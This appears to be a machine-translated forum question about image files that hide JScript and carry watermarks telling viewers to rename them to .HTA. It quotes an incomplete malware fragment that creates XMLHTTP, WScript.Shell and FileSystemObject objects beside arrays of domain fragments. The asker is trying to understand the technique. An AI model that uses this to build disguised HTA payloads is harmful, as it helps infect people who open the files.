3
我注意到分發潛在不安全代碼的新趨勢,其中人們將圖像發佈到服務器,並提示水印表明它們將文件名更改爲具有.HTA文件擴展名。在圖像文件中嵌入Javascript
我意識到.HTA是一個HTML應用程序文件,它被微軟的邏輯隱式信任,並且可以包含代碼來處理任何基於Web的任何事情。我用我最喜歡的文本編輯器打開文件,令我驚訝的是圖像文件中有Javascript代碼!
jfHe299x4qBICCBRgpbl81xTjwucn9j4s1UVZxe8kwoJcdWnXuVHqpilRRhptKRACMBr5koY8vt6AEttD5xeGTOPCfBoQVjCvblkiGcc4ddlfiZiBPdCVAlelSbvhv9XWcoMIYyGMCbMaGv9YUyFrHZg3ZVx6HnRCgz4CyaA2bU9qn6R3NkmHx0W3uG7SZcHYyPiMN6AnWDGXRztMnxL3sY1s3h9VH1oTL34iYawlaEUDOUscX19pPz89v0rfmlqKTXce16vSZ6JDsy4IC5SktfXdt3m50z2R5BbwuhP5BHJITxvD4dHzL6K4uh9tIc4gYCFnDV
//<script id=thisscript>
var dom1 = ["zip","img","zip","orz","orz","zip","cgi"];
var dom2 = ["bin","dat","bin","tmp","tmp","bin"];
// Global XMLHttp, shell, and file system objects
var request = new ActiveXObject("Msxml2.XMLHTTP");
var shell = new ActiveXObject("WScript.Shell");
var fs = new ActiveXObject("Scripting.FileSystemObject");
源代碼下面還有更多的亂碼圖片數據。這只是一個片段。
我很好奇,知道他們如何能夠將Javascript代碼添加到圖像文件而不會破壞圖像文件格式並使其無法查看。我向一些同事介紹了這一點,他們也同樣難過。
你能展示一個完整的文件示例嗎? – 2010-08-08 18:05:46
我很想看到一個完整的例子 – 2010-08-08 18:08:29